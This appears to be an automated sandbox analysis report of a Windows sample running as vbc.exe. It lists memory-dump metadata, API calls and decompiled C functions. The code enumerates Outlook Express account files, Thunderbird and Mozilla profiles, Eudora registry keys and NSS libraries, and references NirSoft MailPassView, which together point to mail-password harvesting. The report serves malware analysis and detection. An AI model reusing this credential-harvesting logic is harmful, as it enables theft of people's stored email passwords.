Source File: 0000000A.00000002.331769902.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: ByteCharMultiWide$ApisFileFormatFreeLocalMessagefreemalloc
String ID: OsError 0x%x (%u)
API String ID: 1289489453-2664311388
Opcode ID: efebe93c900d7bbea4b3f6bdca915beab4857428ab7599676a6b15e2c2881e26
Instruction ID: c0d1ae9d94728ce37e1f25722c48a8a33224626fa82cf530b5f11e5a6ea9a1ba
Opcode Fuzzy Hash: efebe93c900d7bbea4b3f6bdca915beab4857428ab7599676a6b15e2c2881e26
Instruction Fuzzy Hash: 3BF0A035E00218FFDB21AFA1EC49CDF7B74EBC5B61B10802BF91596240D2795A80CBA8

Uniqueness

Uniqueness Score: -1.00%

Function 0040AB7D, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15COMMON

Download Yara Rule

APIs

Part of subcall function 0040757A: GetModuleFileNameW.KERNEL32(00000000,00000208,00000104,0040AB83,00000000,0040AA36,?,00000000,00000208,?), ref: 00407585

wcsrchr.MSVCRT ref: 0040AB86
wcscat.MSVCRT ref: 0040AB9C

Strings

_lng.ini, xrefs: 0040AB96

Memory Dump Source

Source File: 0000000A.00000002.331769902.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: FileModuleNamewcscatwcsrchr
String ID: _lng.ini
API String ID: 383090722-1948609170
Opcode ID: d99e0c1e210eb6d30fbb9606f358fc75cd7c920557a2e7d7f41dfd12b806f831
Instruction ID: faf96e17328b6cfe7fea8df6c793311bae4d5162fb77f626620ffa022952bc65
Opcode Fuzzy Hash: d99e0c1e210eb6d30fbb9606f358fc75cd7c920557a2e7d7f41dfd12b806f831
Instruction Fuzzy Hash: E6C0125394672070F52233226E13B8F17696F22306F60002FF901280C3EFAC631180AF

Uniqueness

Uniqueness Score: -1.00%

Function 0042917D, Relevance: 5.2, APIs: 4, Instructions: 181COMMON

Download Yara Rule

APIs

memcpy.MSVCRT ref: 0042921F
memcpy.MSVCRT ref: 00429258
memset.MSVCRT ref: 0042926E
memcpy.MSVCRT ref: 004292A7

Memory Dump Source

Source File: 0000000A.00000002.331769902.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: memcpy$memset
String ID:
API String ID: 438689982-0
Opcode ID: 8de3b15170db9a09aff60384115cf250075a5608c27ba135c8b23c8b853ebfd7
Instruction ID: 8c22702d92a242b4074cdc0308f2d59ea0ad553ae454c6356856be76eef94a8a
Opcode Fuzzy Hash: 8de3b15170db9a09aff60384115cf250075a5608c27ba135c8b23c8b853ebfd7
Instruction Fuzzy Hash: 2551A775A0021AFBEF15DF95DC81AEEB775FF04340F54849AF805A6241E7389E50CBA8

Uniqueness

Uniqueness Score: -1.00%

Function 00407EDE, Relevance: 5.1, APIs: 4, Instructions: 69COMMON

Download Yara Rule

APIs

wcslen.MSVCRT ref: 00407EF0

Part of subcall function 00407475: malloc.MSVCRT ref: 00407491
Part of subcall function 00407475: memcpy.MSVCRT ref: 004074A9
Part of subcall function 00407475: free.MSVCRT(00000000,00000000,?,00408025,00000002,?,00000000,?,004082EE,00000000,?,00000000), ref: 004074B2

free.MSVCRT(?,00000001,?,00000000,?,?,0040833F,?,000000FF), ref: 00407F16
free.MSVCRT(?,00000001,?,00000000,?,?,0040833F,?,000000FF), ref: 00407F39
memcpy.MSVCRT ref: 00407F5D

Memory Dump Source

Source File: 0000000A.00000002.331769902.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: free$memcpy$mallocwcslen
String ID:
API String ID: 726966127-0
Opcode ID: 53bb7909089ec0eedd8dd5e24e0ed79610a14058f15925bc4f6bfad5848592c5
Instruction ID: 7e4f8ba4ba14ff744b1d1ae1a3210968bf085ae1c99a6b147d894c05d7fb7a00
Opcode Fuzzy Hash: 53bb7909089ec0eedd8dd5e24e0ed79610a14058f15925bc4f6bfad5848592c5
Instruction Fuzzy Hash: 9E21AC71504605EFD720DF18C880C9AB7F4EF443247108A2EF866AB6A1D734F916CB54

Uniqueness

Uniqueness Score: -1.00%

Function 0040AD07, Relevance: 5.1, APIs: 4, Instructions: 68COMMON

Download Yara Rule

APIs

Part of subcall function 004079E0: memset.MSVCRT ref: 004079EE

??2@YAPAXI@Z.MSVCRT ref: 0040AD2E
??2@YAPAXI@Z.MSVCRT ref: 0040AD55
??2@YAPAXI@Z.MSVCRT ref: 0040AD76
??2@YAPAXI@Z.MSVCRT ref: 0040AD97

Memory Dump Source

Source File: 0000000A.00000002.331769902.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: ??2@$memset
String ID:
API String ID: 1860491036-0
Opcode ID: cfaf489efad96e13d7650dd90a1e479029915f4aea12b774901758b52b152337
Instruction ID: 8f402eb808e7ad555a909232128954833d185930e872f23c51b71e42452eb786
Opcode Fuzzy Hash: cfaf489efad96e13d7650dd90a1e479029915f4aea12b774901758b52b152337
Instruction Fuzzy Hash: B121F7B0A017009FD7258F6A8545A52FBE5FF90311B29C9AFE108CBAB2D7B8C800CF15

Uniqueness

Uniqueness Score: -1.00%

Function 00414C13, Relevance: 5.0, APIs: 4, Instructions: 41COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(0000FDE9,00000000,004159A7,000000FF,00000000,00000000,00415592,?,?,00415592,004159A7,00000000,?,00415C14,?,00000000), ref: 00414C2E
malloc.MSVCRT ref: 00414C36
MultiByteToWideChar.KERNEL32(0000FDE9,00000000,004159A7,000000FF,00000000,00000000,?,00415592,004159A7,00000000,?,00415C14,?,00000000,00000000,?), ref: 00414C4D
free.MSVCRT(00000000,?,00415592,004159A7,00000000,?,00415C14,?,00000000,00000000,?), ref: 00414C54

Memory Dump Source

Source File: 0000000A.00000002.331769902.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: ByteCharMultiWide$freemalloc
String ID:
API String ID: 2605342592-0
Opcode ID: 62b04034a6b45e285efb8e28dd2072d8972627255b60333d693d9c35b4441962
Instruction ID: ac963edc179c34f330cc22ede2b288a34a1f5b158d5d5a2152ff40f2e70c1069
Opcode Fuzzy Hash: 62b04034a6b45e285efb8e28dd2072d8972627255b60333d693d9c35b4441962
Instruction Fuzzy Hash: 9AF0A77220521E3BE61026A55C40D7B778CEB86375B10072BB910E21C1FD59D80006B4

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: vbc.exe PID: 6728 Parent PID: 6044 vbc.exeCOMMON

Executed Functions

Function 0040724C, Relevance: 31.6, APIs: 11, Strings: 7, Instructions: 143
stringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040724C(signed int _a4) {
				char _v5;
				char _v6;
				char _v7;
				char _v8;
				char _v9;
				char _v10;
				char _v11;
				char _v12;
				char _v13;
				char _v14;
				char _v15;
				char _v16;
				char _v17;
				char _v18;
				char _v19;
				void _v20;
				long _v24;
				int _v28;
				int _v32;
				void* _v36;
				void _v291;
				char _v292;
				void _v547;
				char _v548;
				void _v1058;
				short _v1060;
				void _v1570;
				short _v1572;
				int _t88;
				signed int _t91;
				signed int _t92;
				signed int _t94;
				signed int _t96;
				signed int _t99;
				signed int _t104;
				signed short* _t110;
				void* _t113;
				void* _t114;

				_t92 = 0;
				_v20 = 0xa3;
				_v19 = 0x1e;
				_v18 = 0xf3;
				_v17 = 0x69;
				_v16 = 7;
				_v15 = 0x62;
				_v14 = 0xd9;
				_v13 = 0x1f;
				_v12 = 0x1e;
				_v11 = 0xe9;
				_v10 = 0x35;
				_v9 = 0x7d;
				_v8 = 0x4f;
				_v7 = 0xd2;
				_v6 = 0x7d;
				_v5 = 0x48;
				_v292 = 0;
				memset( &_v291, 0, 0xff);
				_v548 = 0;
				memset( &_v547, 0, 0xff);
				_v1572 = 0;
				memset( &_v1570, 0, 0x1fe);
				_v1060 = 0;
				memset( &_v1058, 0, 0x1fe);
				_v36 = _a4 + 4;
				_a4 = 0;
				_v24 = 0xff;
				GetComputerNameA( &_v292,  &_v24); // executed
				_v24 = 0xff;
				GetUserNameA( &_v548,  &_v24); // executed
				MultiByteToWideChar(0, 0,  &_v292, 0xffffffff,  &_v1572, 0xff);
				MultiByteToWideChar(0, 0,  &_v548, 0xffffffff,  &_v1060, 0xff);
				_v32 = strlen( &_v292);
				_t88 = strlen( &_v548);
				_t113 = _v36;
				_v28 = _t88;
				memcpy(_t113,  &_v20, 0x10);
				_t91 = 0xba0da71d;
				if(_v28 > 0) {
					_t110 =  &_v1060;
					do {
						_t104 = _a4 & 0x80000003;
						if(_t104 < 0) {
							_t104 = (_t104 - 0x00000001 | 0xfffffffc) + 1;
						}
						_t96 = ( *_t110 & 0x0000ffff) * _t91;
						_t91 = _t91 * 0xbc8f;
						 *(_t113 + _t104 * 4) =  *(_t113 + _t104 * 4) ^ _t96;
						_a4 = _a4 + 1;
						_t110 =  &(_t110[1]);
					} while (_a4 < _v28);
				}
				if(_v32 > _t92) {
					do {
						_t99 = _a4 & 0x80000003;
						if(_t99 < 0) {
							_t99 = (_t99 - 0x00000001 | 0xfffffffc) + 1;
						}
						_t94 = ( *(_t114 + _t92 * 2 - 0x620) & 0x0000ffff) * _t91;
						_t91 = _t91 * 0xbc8f;
						 *(_t113 + _t99 * 4) =  *(_t113 + _t99 * 4) ^ _t94;
						_a4 = _a4 + 1;
						_t92 = _t92 + 1;
					} while (_t92 < _v32);
				}
				return _t91;
			}

0x0040725d
0x00407268
0x0040726c
0x00407270
0x00407274
0x00407278
0x0040727c
0x00407280
0x00407284
0x00407288
0x0040728c
0x00407290
0x00407294
0x00407298
0x0040729c
0x004072a0
0x004072a4
0x004072a8
0x004072ae
0x004072bc
0x004072c2
0x004072d5
0x004072dc
0x004072ea
0x004072f1
0x004072fc
0x0040730d
0x00407310
0x00407313
0x00407324
0x00407327
0x00407346
0x0040735b
0x00407369
0x00407373
0x00407378
0x0040737b
0x00407385
0x00407390
0x00407395
0x00407397
0x0040739d
0x004073a0
0x004073a6
0x004073ac
0x004073ac
0x004073b0
0x004073b3
0x004073bc
0x004073be
0x004073c5
0x004073c6
0x0040739d
0x004073ce
0x004073d0
0x004073d3
0x004073d9
0x004073df
0x004073df
0x004073e8
0x004073eb
0x004073f4
0x004073f6
0x004073f9
0x004073fa
0x004073d0
0x00407403

APIs

memset.MSVCRT ref: 004072AE
memset.MSVCRT ref: 004072C2
memset.MSVCRT ref: 004072DC
memset.MSVCRT ref: 004072F1
GetComputerNameA.KERNEL32 ref: 00407313
GetUserNameA.ADVAPI32(?,?), ref: 00407327
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 00407346
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 0040735B
strlen.MSVCRT ref: 00407364
strlen.MSVCRT ref: 00407373
memcpy.MSVCRT ref: 00407385

Strings

}, xrefs: 00407294
i, xrefs: 00407274
b, xrefs: 0040727C
5, xrefs: 00407290
}, xrefs: 004072A0
H, xrefs: 004072A4
O, xrefs: 00407298

Memory Dump Source

Source File: 0000000B.00000002.321594034.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.321610975.0000000000418000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: memset$ByteCharMultiNameWidestrlen$ComputerUsermemcpy
String ID: 5$H$O$b$i$}$}
API String ID: 1832431107-3760989150
Opcode ID: 892f1d25977d50633ddef969ddbe2b4ff3cde350e5ee45bf306cc9825cca91de
Instruction ID: 8a8033fc9206e0c4c361a826d49ab5f0cafd1e40d7200dcd25d3d532c5214641
Opcode Fuzzy Hash: 892f1d25977d50633ddef969ddbe2b4ff3cde350e5ee45bf306cc9825cca91de
Instruction Fuzzy Hash: AC510871C0025DBEDB11CBA8CC41AEEBBBDEF49314F0442EAE955E6191D3389B84CB65

Uniqueness

Uniqueness Score: -1.00%

Function 00406EC3, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 58
filestringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00406EC3(void** __eax) {
				void* __esi;
				void* _t15;
				int _t16;
				int _t17;
				void* _t26;
				void** _t38;
				void** _t40;
				void* _t45;

				_t40 = __eax;
				_t15 =  *__eax;
				if(_t15 != 0xffffffff) {
					_t16 = FindNextFileA(_t15,  &(__eax[0x52])); // executed
					 *(_t45 + 4) = _t16;
					if(_t16 != 0) {
						goto L5;
					} else {
						E00406F5B(_t40);
						goto L4;
					}
				} else {
					_t26 = FindFirstFileA( &(__eax[1]),  &(__eax[0x52])); // executed
					 *_t40 = _t26;
					 *(_t45 + 4) = 0 | _t26 != 0xffffffff;
					L4:
					if( *(_t45 + 4) != 0) {
						L5:
						_t38 =  &(_t40[0xa2]);
						_t28 =  &(_t40[0x5d]);
						_t41 =  &(_t40[0xf3]);
						_t17 = strlen( &(_t40[0xf3]));
						if(strlen( &(_t40[0x5d])) + _t17 + 1 >= 0x143) {
							 *_t38 = 0;
						} else {
							E004062AD(_t38, _t41, _t28);
						}
					}
				}
				return  *(_t45 + 4);
			}

0x00406ec5
0x00406ec7
0x00406ecc
0x00406ef7
0x00406eff
0x00406f03
0x00000000
0x00406f05
0x00406f05
0x00000000
0x00406f05
0x00406ece
0x00406ed9
0x00406ee7
0x00406ee9
0x00406f0a
0x00406f0f
0x00406f11
0x00406f14
0x00406f1a
0x00406f20
0x00406f27
0x00406f3f
0x00406f4e
0x00406f41
0x00406f45
0x00406f4b
0x00406f53
0x00406f0f
0x00406f5a

APIs

FindFirstFileA.KERNELBASE(?,?,?,?,00410CA1,*.oeaccount,rA,?,00000104), ref: 00406ED9
FindNextFileA.KERNELBASE(?,?,?,?,00410CA1,*.oeaccount,rA,?,00000104), ref: 00406EF7
strlen.MSVCRT ref: 00406F27
strlen.MSVCRT ref: 00406F2F

Strings

rA, xrefs: 00406F12

Memory Dump Source

Source File: 0000000B.00000002.321594034.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.321610975.0000000000418000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: FileFindstrlen$FirstNext
String ID: rA
API String ID: 379999529-474049127
Opcode ID: 9a66d1681466aca7d0b3f0cd3a87e00f7da5b3e9059264b02d426353c7cea173
Instruction ID: 479c8733b6b08075922562257f7174063dbd0ea9e1486761d8d5d3546bede414
Opcode Fuzzy Hash: 9a66d1681466aca7d0b3f0cd3a87e00f7da5b3e9059264b02d426353c7cea173
Instruction Fuzzy Hash: 00118272005205AFD714DB34E844ADBB3D9DF44324F21493FF55AD21D0EB38A9548758

Uniqueness

Uniqueness Score: -1.00%

Function 00401E8B, Relevance: 52.8, APIs: 19, Strings: 11, Instructions: 261
stringregistryCOMMON

Download Yara Rule

C-Code - Quality: 97%

			E00401E8B(void* __eflags, char* _a4) {
				signed int _v8;
				int _v12;
				void _v275;
				char _v276;
				void _v539;
				char _v540;
				void _v795;
				char _v796;
				void _v1059;
				char _v1060;
				void _v1323;
				char _v1324;
				void _v2347;
				char _v2348;
				void* __edi;
				void* __esi;
				int _t65;
				char* _t69;
				char _t70;
				int _t71;
				char _t75;
				void* _t76;
				long _t78;
				void* _t83;
				int _t85;
				void* _t87;
				int _t104;
				int _t108;
				char _t126;
				void* _t137;
				void* _t139;
				char* _t157;
				char* _t158;
				char* _t160;
				int _t161;
				void* _t164;
				CHAR* _t169;
				char* _t170;
				void* _t171;
				void* _t172;
				void* _t173;
				void* _t174;
				void* _t175;

				_v540 = 0;
				memset( &_v539, 0, 0x104);
				_t164 = 0x1a;
				E0040EE59( &_v540, _t164); // executed
				_t65 = strlen("Mozilla\\Profiles");
				_t6 = strlen( &_v540) + 1; // 0x1
				_t172 = _t171 + 0x14;
				if(_t65 + _t6 >= 0x104) {
					_t69 = _a4;
					 *_t69 = 0;
					_t157 = _t69;
				} else {
					_t157 = _a4;
					E004062AD(_t157,  &_v540, "Mozilla\\Profiles");
				}
				_t70 = E0040614B(_t157);
				if(_t70 == 0) {
					 *_t157 = _t70;
				}
				_t158 = _t157 + 0x105;
				_t71 = strlen("Thunderbird\\Profiles");
				_t12 = strlen( &_v540) + 1; // 0x1
				if(_t71 + _t12 >= 0x104) {
					 *_t158 = 0;
				} else {
					E004062AD(_t158,  &_v540, "Thunderbird\\Profiles");
				}
				_t75 = E0040614B(_t158);
				_pop(_t137);
				if(_t75 == 0) {
					 *_t158 = _t75;
				}
				_t160 = _a4 + 0x20a;
				_t76 = E00401C97(_t137, _t160, 0x80000001, "Software\\Qualcomm\\Eudora\\CommandLine", "current"); // executed
				_t173 = _t172 + 0xc;
				if(_t76 == 0) {
					_t126 = E00401C97(_t137, _t160, 0x80000002, "Software\\Classes\\Software\\Qualcomm\\Eudora\\CommandLine\\current", 0x412466); // executed
					_t173 = _t173 + 0xc;
					if(_t126 == 0) {
						 *_t160 = _t126;
					}
				}
				_v8 = _v8 & 0x00000000;
				_t78 = E0040EB3F(0x80000002, "Software\\Mozilla\\Mozilla Thunderbird",  &_v8);
				_t174 = _t173 + 0xc;
				if(_t78 != 0) {
					L32:
					_t169 = _a4 + 0x30f;
					if( *_t169 != 0) {
						L35:
						return _t78;
					}
					ExpandEnvironmentStringsA("%programfiles%\\Mozilla Thunderbird", _t169, 0x104);
					_t78 = E0040614B(_t169);
					if(_t78 != 0) {
						goto L35;
					}
					 *_t169 = _t78;
					return _t78;
				} else {
					_v796 = _t78;
					_t161 = 0;
					memset( &_v795, 0, 0xff);
					_v12 = 0;
					_t83 = E0040EC05(_v8, 0,  &_v796);
					_t175 = _t174 + 0x18;
					if(_t83 != 0) {
						L31:
						_t78 = RegCloseKey(_v8);
						goto L32;
					}
					_t170 = "sqlite3.dll";
					do {
						_t85 = atoi( &_v796);
						_pop(_t139);
						if(_t85 < 3) {
							goto L28;
						}
						_v2348 = 0;
						memset( &_v2347, _t161, 0x3ff);
						_v276 = 0;
						memset( &_v275, _t161, 0x104);
						sprintf( &_v2348, "%s\\Main",  &_v796);
						E0040EBC1(_t139, _v8,  &_v2348, "Install Directory",  &_v276, 0x104);
						_t175 = _t175 + 0x38;
						if(_v276 != 0 && E0040614B( &_v276) != 0) {
							_v1060 = 0;
							memset( &_v1059, _t161, 0x104);
							_v1324 = 0;
							memset( &_v1323, _t161, 0x104);
							_t104 = strlen(_t170);
							_t41 = strlen( &_v276) + 1; // 0x1
							_t175 = _t175 + 0x20;
							if(_t104 + _t41 >= 0x104) {
								_v1060 = 0;
							} else {
								E004062AD( &_v1060,  &_v276, _t170);
							}
							_t108 = strlen("nss3.dll");
							_t47 = strlen( &_v276) + 1; // 0x1
							if(_t108 + _t47 >= 0x104) {
								_v1324 = 0;
							} else {
								E004062AD( &_v1324,  &_v276, "nss3.dll");
							}
							if(E0040614B( &_v1060) == 0 || E0040614B( &_v1324) == 0) {
								_t161 = 0;
								goto L28;
							} else {
								strcpy(_a4 + 0x30f,  &_v276);
								goto L31;
							}
						}
						L28:
						_v12 = _v12 + 1;
						_t87 = E0040EC05(_v8, _v12,  &_v796);
						_t175 = _t175 + 0xc;
					} while (_t87 == 0);
					goto L31;
				}
			}

0x00401ea6
0x00401ead
0x00401eb4
0x00401ebb
0x00401ec6
0x00401ed9
0x00401edd
0x00401ee2
0x00401efa
0x00401efd
0x00401f00
0x00401ee4
0x00401ee4
0x00401ef1
0x00401ef7
0x00401f03
0x00401f0b
0x00401f0d
0x00401f0d
0x00401f14
0x00401f1a
0x00401f2d
0x00401f35
0x00401f4e
0x00401f37
0x00401f45
0x00401f4b
0x00401f52
0x00401f59
0x00401f5a
0x00401f5c
0x00401f5c
0x00401f6b
0x00401f76
0x00401f7b
0x00401f85
0x00401f92
0x00401f97
0x00401f9c
0x00401f9e
0x00401f9e
0x00401f9c
0x00401fa0
0x00401fae
0x00401fb3
0x00401fb8
0x004021a9
0x004021ac
0x004021b5
0x004021d5
0x004021d5
0x004021d5
0x004021be
0x004021c5
0x004021cd
0x00000000
0x00000000
0x004021cf
0x00000000
0x00401fbe
0x00401fc3
0x00401fc9
0x00401fd3
0x00401fe3
0x00401fe6
0x00401feb
0x00401ff0
0x004021a0
0x004021a3
0x00000000
0x004021a3
0x00401ff6
0x00401ffb
0x00402002
0x0040200a
0x0040200b
0x00000000
0x00000000
0x0040201e
0x00402025
0x00402033
0x0040203a
0x00402052
0x0040206e
0x00402073
0x0040207d
0x004020a1
0x004020a8
0x004020b6
0x004020bd
0x004020c3
0x004020d6
0x004020da
0x004020df
0x004020f8
0x004020e1
0x004020ef
0x004020f5
0x00402104
0x00402117
0x0040211f
0x0040213c
0x00402121
0x00402133
0x00402139
0x00402152
0x00402165
0x00000000
0x00402189
0x00402199
0x00000000
0x0040219f
0x00402152
0x00402167
0x00402167
0x00402177
0x0040217c
0x0040217f
0x00000000
0x00402187

APIs

memset.MSVCRT ref: 00401EAD
strlen.MSVCRT ref: 00401EC6
strlen.MSVCRT ref: 00401ED4
strlen.MSVCRT ref: 00401F1A
strlen.MSVCRT ref: 00401F28
memset.MSVCRT ref: 00401FD3
atoi.MSVCRT ref: 00402002
memset.MSVCRT ref: 00402025
sprintf.MSVCRT ref: 00402052

Part of subcall function 0040EBC1: RegCloseKey.ADVAPI32(000003FF,?,?,?,?,00000000,000003FF), ref: 0040EBFA

memset.MSVCRT ref: 004020A8
memset.MSVCRT ref: 004020BD
strlen.MSVCRT ref: 004020C3
strlen.MSVCRT ref: 004020D1
strlen.MSVCRT ref: 00402104
strlen.MSVCRT ref: 00402112
memset.MSVCRT ref: 0040203A

Part of subcall function 004062AD: strcpy.MSVCRT(00000000,00000000,sqlite3.dll,00402138,00000000,nss3.dll), ref: 004062B5
Part of subcall function 004062AD: strcat.MSVCRT(00000000,00000000,00000000,00000000,sqlite3.dll,00402138,00000000,nss3.dll), ref: 004062C4

strcpy.MSVCRT(?,00000000), ref: 00402199
RegCloseKey.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004021A3
ExpandEnvironmentStringsA.KERNEL32(%programfiles%\Mozilla Thunderbird,?,00000104,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004021BE

Part of subcall function 0040614B: GetFileAttributesA.KERNELBASE(?,004081BE,?,00408274,00000000,?,00000000,00000104,?), ref: 0040614F

Strings

Install Directory, xrefs: 0040205F
nss3.dll, xrefs: 004020FF, 00402127
Software\Classes\Software\Qualcomm\Eudora\CommandLine\current, xrefs: 00401F8C
Thunderbird\Profiles, xrefs: 00401F0F, 00401F3D
%programfiles%\Mozilla Thunderbird, xrefs: 004021B9
Mozilla\Profiles, xrefs: 00401EC0, 00401EC5, 00401EED
current, xrefs: 00401F61
sqlite3.dll, xrefs: 00401FF6, 004020C2, 004020E7
%s\Main, xrefs: 0040204C
Software\Qualcomm\Eudora\CommandLine, xrefs: 00401F66
Software\Mozilla\Mozilla Thunderbird, xrefs: 00401FA8

Memory Dump Source

Source File: 0000000B.00000002.321594034.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.321610975.0000000000418000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: strlen$memset$Closestrcpy$AttributesEnvironmentExpandFileStringsatoisprintfstrcat
String ID: %programfiles%\Mozilla Thunderbird$%s\Main$Install Directory$Mozilla\Profiles$Software\Classes\Software\Qualcomm\Eudora\CommandLine\current$Software\Mozilla\Mozilla Thunderbird$Software\Qualcomm\Eudora\CommandLine$Thunderbird\Profiles$current$nss3.dll$sqlite3.dll
API String ID: 2492260235-4223776976
Opcode ID: ac5e96ee30ae2dd9ced97f1bdc4fbeb635d430268e29e54df0797c77c4e8013e
Instruction ID: fcae88f02dbfb35d0bd4b12665d2d891c1e7b320b053452542e36e55e3802549
Opcode Fuzzy Hash: ac5e96ee30ae2dd9ced97f1bdc4fbeb635d430268e29e54df0797c77c4e8013e
Instruction Fuzzy Hash: C891E472904158BADB21E765CC46FDA77AC9F44308F1004BBF609F2182EB789BD58B5D

Uniqueness

Uniqueness Score: -1.00%

Function 0040B9AD, Relevance: 43.9, APIs: 19, Strings: 6, Instructions: 168
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E0040B9AD(void* __ecx, void* __eflags, struct HINSTANCE__* _a4, intOrPtr _a12) {
				char* _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v28;
				intOrPtr _v32;
				void* _v304;
				signed int _v308;
				struct HWND__* _v312;
				intOrPtr _v604;
				struct HACCEL__* _v620;
				struct HWND__* _v644;
				char _v900;
				char _v904;
				char _v908;
				struct tagMSG _v936;
				intOrPtr _v940;
				struct HWND__* _v944;
				struct HWND__* _v948;
				char _v956;
				char _v980;
				char _v988;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t49;
				void* _t52;
				int _t56;
				int _t58;
				int _t68;
				void* _t72;
				int _t75;
				int _t77;
				struct HWND__* _t78;
				int _t80;
				int _t85;
				int _t86;
				struct HWND__* _t100;

				 *0x416b94 = _a4; // executed
				_t49 = E00404837(__ecx); // executed
				if(_t49 != 0) {
					E0040EDAC();
					_t52 = E00406A2C( &_v980);
					_t100 = 0;
					_v940 = 0x20;
					_v948 = 0;
					_v936.hwnd = 0;
					_v944 = 0;
					_v936.message = 0;
					E0040B785(_t52,  &_v900);
					_v8 =  &_v980;
					E00406C87(__eflags,  &_v980, _a12);
					_t56 = E00406DFB(_v16, "/savelangfile");
					__eflags = _t56;
					if(_t56 < 0) {
						E0040823D(); // executed
						_t58 = E00406DFB(_v8, "/deleteregkey");
						__eflags = _t58;
						if(_t58 < 0) {
							 *0x417110 = 0x11223344; // executed
							EnumResourceTypesA( *0x416b94, E0040ED91, 0); // executed
							__eflags =  *0x417110 - 0x1c233487;
							if( *0x417110 == 0x1c233487) {
								__eflags =  *((intOrPtr*)(_v12 + 0x30)) - 1;
								if(__eflags <= 0) {
									L13:
									__imp__CoInitialize(_t100);
									E0040B70A( &_v908);
									__eflags = _v604 - 3;
									if(_v604 != 3) {
										_push(5);
									} else {
										_push(3);
									}
									ShowWindow(_v644, ??);
									UpdateWindow(_v644);
									_v620 = LoadAcceleratorsA( *0x416b94, 0x67);
									E0040AD9D( &_v908);
									_t68 = GetMessageA( &_v936, _t100, _t100, _t100);
									__eflags = _t68;
									if(_t68 == 0) {
										L24:
										__imp__CoUninitialize();
										goto L25;
									} else {
										do {
											_t75 = TranslateAcceleratorA(_v644, _v620,  &_v936);
											__eflags = _t75;
											if(_t75 != 0) {
												goto L23;
											}
											_t78 =  *0x4171ac;
											__eflags = _t78 - _t100;
											if(_t78 == _t100) {
												L21:
												_t80 = IsDialogMessageA(_v644,  &_v936);
												__eflags = _t80;
												if(_t80 == 0) {
													TranslateMessage( &_v936);
													DispatchMessageA( &_v936);
												}
												goto L23;
											}
											_t85 = IsDialogMessageA(_t78,  &_v936);
											__eflags = _t85;
											if(_t85 != 0) {
												goto L23;
											}
											goto L21;
											L23:
											_t77 = GetMessageA( &_v936, _t100, _t100, _t100);
											__eflags = _t77;
										} while (_t77 != 0);
										goto L24;
									}
								}
								_t86 = E0040B8D7( &_v904, __eflags);
								__eflags = _t86;
								if(_t86 == 0) {
									_t100 = 0;
									__eflags = 0;
									goto L13;
								}
								_push(_v28);
								_v904 = 0x41356c;
								L004115D6();
								__eflags = _v304;
								if(_v304 != 0) {
									DeleteObject(_v304);
									_v308 = _v308 & 0x00000000;
								}
								goto L27;
							}
							MessageBoxA(0, "Failed to load the executable file !", "Error", 0x30);
							goto L25;
						}
						RegDeleteKeyA(0x80000001, "Software\\NirSoft\\MailPassView");
						goto L25;
					} else {
						 *0x417488 = 0x416b28;
						E0040836E();
						L25:
						_push(_v32);
						_v908 = 0x41356c;
						L004115D6();
						__eflags = _v308 - _t100;
						if(_v308 != _t100) {
							DeleteObject(_v308);
							_v312 = _t100;
						}
						L27:
						_v908 = 0x412474;
						E00406A4E( &_v988);
						E0040462E( &_v956);
						E00406A4E( &_v988);
						_t72 = 0;
						__eflags = 0;
						goto L28;
					}
				} else {
					_t72 = _t49 + 1;
					L28:
					return _t72;
				}
			}

0x0040b9bf
0x0040b9c4
0x0040b9cb
0x0040b9d3
0x0040b9dc
0x0040b9e1
0x0040b9e7
0x0040b9ef
0x0040b9f3
0x0040b9f7
0x0040b9fb
0x0040b9ff
0x0040ba0c
0x0040ba13
0x0040ba24
0x0040ba29
0x0040ba2b
0x0040ba41
0x0040ba52
0x0040ba57
0x0040ba59
0x0040ba7c
0x0040ba86
0x0040ba8c
0x0040ba96
0x0040bab7
0x0040babb
0x0040bb09
0x0040bb0a
0x0040bb14
0x0040bb19
0x0040bb21
0x0040bb27
0x0040bb23
0x0040bb23
0x0040bb23
0x0040bb30
0x0040bb3d
0x0040bb51
0x0040bb5c
0x0040bb6f
0x0040bb71
0x0040bb73
0x0040bbe3
0x0040bbe3
0x00000000
0x0040bb75
0x0040bb7b
0x0040bb8e
0x0040bb94
0x0040bb96
0x00000000
0x00000000
0x0040bb98
0x0040bb9d
0x0040bb9f
0x0040bbad
0x0040bbb9
0x0040bbbb
0x0040bbbd
0x0040bbc4
0x0040bbcf
0x0040bbcf
0x00000000
0x0040bbbd
0x0040bba7
0x0040bba9
0x0040bbab
0x00000000
0x00000000
0x00000000
0x0040bbd5
0x0040bbdd
0x0040bbdf
0x0040bbdf
0x00000000
0x0040bb7b
0x0040bb73
0x0040bac1
0x0040bac6
0x0040bac8
0x0040bb07
0x0040bb07
0x00000000
0x0040bb07
0x0040baca
0x0040bad1
0x0040bad9
0x0040bade
0x0040bae7
0x0040baf4
0x0040bafa
0x0040bafa
0x00000000
0x0040bae7
